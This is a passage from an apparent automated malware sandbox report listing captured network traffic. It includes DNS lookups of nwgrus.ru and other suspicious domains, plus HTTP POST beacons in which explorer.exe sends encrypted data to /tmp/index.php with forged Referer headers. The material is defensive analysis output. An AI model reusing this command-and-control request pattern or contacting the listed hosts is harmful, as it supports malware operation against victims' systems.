                                                                      Sep 25, 2024 16:03:52.543535948 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:52.543936014 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:52.543947935 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.142972946 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.143085957 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.144599915 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.144613028 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.144861937 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.184146881 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.184170961 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.184256077 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.528382063 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.528583050 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.528759003 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.559597969 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.559650898 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:03:53.559767008 CEST49755443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:03:53.559775114 CEST4434975523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:03.026755095 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:03.031595945 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:03.031698942 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:03.031873941 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:03.031912088 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:03.036664963 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:03.036815882 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:04.581497908 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:04.584372044 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:04.585526943 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:04.585560083 CEST4975680192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:04.590509892 CEST8049756190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:13.159389019 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.159427881 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:13.159513950 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.159879923 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.159889936 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:13.853146076 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:13.853313923 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.854669094 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.854677916 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:13.854923010 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:13.856147051 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.856179953 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:13.856211901 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:14.335510015 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:14.335612059 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:14.335686922 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:14.335922956 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:14.335939884 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:14.335958958 CEST49757443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:14.335963964 CEST4434975723.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:25.658009052 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663450003 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:25.663579941 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663769960 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.663795948 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:25.669086933 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:25.669507980 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.955331087 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.957564116 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:26.957735062 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:26.957901001 CEST4975880192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:26.962722063 CEST8049758190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:36.165013075 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165071964 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.165149927 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165580988 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.165594101 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.768271923 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.768429995 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.811116934 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.811144114 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.811431885 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:36.813628912 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.813661098 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:36.813687086 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140070915 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140485048 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.140558958 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151051044 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151076078 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:37.151089907 CEST49759443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:37.151098013 CEST4434975923.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:48.742728949 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.749726057 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:48.749828100 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.750010014 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.750046015 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:48.756885052 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:48.759119987 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.037108898 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.039180994 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:50.039241076 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:50.039287090 CEST4976080192.168.2.5190.98.23.157
                                                                      Sep 25, 2024 16:04:50.044171095 CEST8049760190.98.23.157192.168.2.5
                                                                      Sep 25, 2024 16:04:58.526947975 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527015924 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:58.527113914 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527661085 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:58.527679920 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.134339094 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.134445906 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.135802984 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.135827065 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.136086941 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.136890888 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.136917114 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.136965036 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516201973 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516283035 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516355991 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516544104 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516570091 CEST4434976123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:04:59.516587019 CEST49761443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:04:59.516597033 CEST4434976123.145.40.162192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Sep 25, 2024 16:01:27.300789118 CEST6168553192.168.2.51.1.1.1
                                                                      Sep 25, 2024 16:01:28.308608055 CEST6168553192.168.2.51.1.1.1
                                                                      Sep 25, 2024 16:01:29.324637890 CEST6168553192.168.2.51.1.1.1
                                                                      Sep 25, 2024 16:01:29.684042931 CEST53616851.1.1.1192.168.2.5
                                                                      Sep 25, 2024 16:01:29.684061050 CEST53616851.1.1.1192.168.2.5
                                                                      Sep 25, 2024 16:01:29.685033083 CEST53616851.1.1.1192.168.2.5
                                                                      Sep 25, 2024 16:02:19.508761883 CEST6375253192.168.2.51.1.1.1
                                                                      Sep 25, 2024 16:02:19.525465965 CEST53637521.1.1.1192.168.2.5
                                                                      Sep 25, 2024 16:04:02.849618912 CEST5522053192.168.2.51.1.1.1
                                                                      Sep 25, 2024 16:04:03.025785923 CEST53552201.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Sep 25, 2024 16:01:27.300789118 CEST192.168.2.51.1.1.10x6f8aStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:28.308608055 CEST192.168.2.51.1.1.10x6f8aStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.324637890 CEST192.168.2.51.1.1.10x6f8aStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:02:19.508761883 CEST192.168.2.51.1.1.10x2718Standard query (0)calvinandhalls.comA (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:02.849618912 CEST192.168.2.51.1.1.10x68c5Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Sep 25, 2024 16:01:20.447504044 CEST1.1.1.1192.168.2.50xab35No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:20.447504044 CEST1.1.1.1192.168.2.50xab35No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:21.306057930 CEST1.1.1.1192.168.2.50xa1cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:21.306057930 CEST1.1.1.1192.168.2.50xa1cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684042931 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.684061050 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru116.58.10.60A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru201.233.78.169A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru189.195.132.134A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru190.187.52.42A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:01:29.685033083 CEST1.1.1.1192.168.2.50x6f8aNo error (0)nwgrus.ru181.204.98.226A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:02:19.525465965 CEST1.1.1.1192.168.2.50x2718No error (0)calvinandhalls.com23.145.40.162A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru190.98.23.157A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru93.118.137.82A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru2.185.214.11A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru181.128.22.240A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru211.181.24.133A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru211.168.53.110A (IP address)IN (0x0001)false
                                                                      Sep 25, 2024 16:04:03.025785923 CEST1.1.1.1192.168.2.50x68c5No error (0)nwgrus.ru41.251.205.33A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 23.145.40.164
                                                                      • https:
                                                                        • calvinandhalls.com
                                                                      • bdxvqfpjlsvhpaof.org
                                                                        • nwgrus.ru
                                                                      • uotbaartbcqldrdx.org
                                                                      • kdulrgfaviysx.org
                                                                      • jlkucuylyof.org
                                                                      • ejvnhlvhpussik.org
                                                                      • vsagqcxnudryn.com
                                                                      • fogsqjysaystoh.org
                                                                      • verasvafreecifd.org
                                                                      • eaxyrbajkqo.org
                                                                      • dfqwnqnvxbwcwpps.com
                                                                      • ovvofxjtrlcblbe.com
                                                                      • khaxmqmrelincl.org
                                                                      • tuivtdfccoxjstqv.net
                                                                      • ktflshoikbglbj.net
                                                                      • xapousftkgr.net
                                                                      • xhvcwlrrfnr.org
                                                                      • edyhjfoqqme.com
                                                                      • ecpbasxejvhmni.com
                                                                      • pklhudfcrpsm.org
                                                                      • bwdwojspdgtrj.net
                                                                      • otxnyveihviep.com
                                                                      • btdksbvigeadnr.com
                                                                      • xwykiojnclenqqi.net
                                                                      • nhtxkrllcfsfts.org
                                                                      • xdbwevihetlvramf.org
                                                                      • kktprwryymhwgw.com
                                                                      • waytjuqjooe.org
                                                                      • seyshogepyribe.com
                                                                      • jjfnbkmpvhxjsu.net
                                                                      • btusdqnvtphf.org
                                                                      • utinkaubisghnyye.net
                                                                      • jkjogobunqlid.org
                                                                      • ohoqxgflpcpf.com
                                                                      • rcdwkbgyoixtxr.org

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549711116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:29.713839054 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://bdxvqfpjlsvhpaof.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 121
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:29.713872910 CEST121OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 40 ca fe
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA .[k,vu+@rVvm!j0H~tc:x
                                                                      Sep 25, 2024 16:01:30.964297056 CEST152INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:30 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 04 00 00 00 72 e8 86 ea
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.549712116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:30.973973989 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://uotbaartbcqldrdx.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 328
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:30.973973989 CEST328OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 55 1d bd ac
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuUncEu+EF_ts+V+u!_:+`S<+T}!dFxUBLbeKB%0O4dVr<0Dc]-J"F
                                                                      Sep 25, 2024 16:01:32.199060917 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:31 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.549713116.58.10.60801028C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Sep 25, 2024 16:01:32.214114904 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kdulrgfaviysx.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 141
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:32.214138985 CEST141OUTData Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 27 0e c4 ff
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu'R\s_F*;\W{4"582;?
                                                                      Sep 25, 2024 16:01:33.463205099 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:33 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
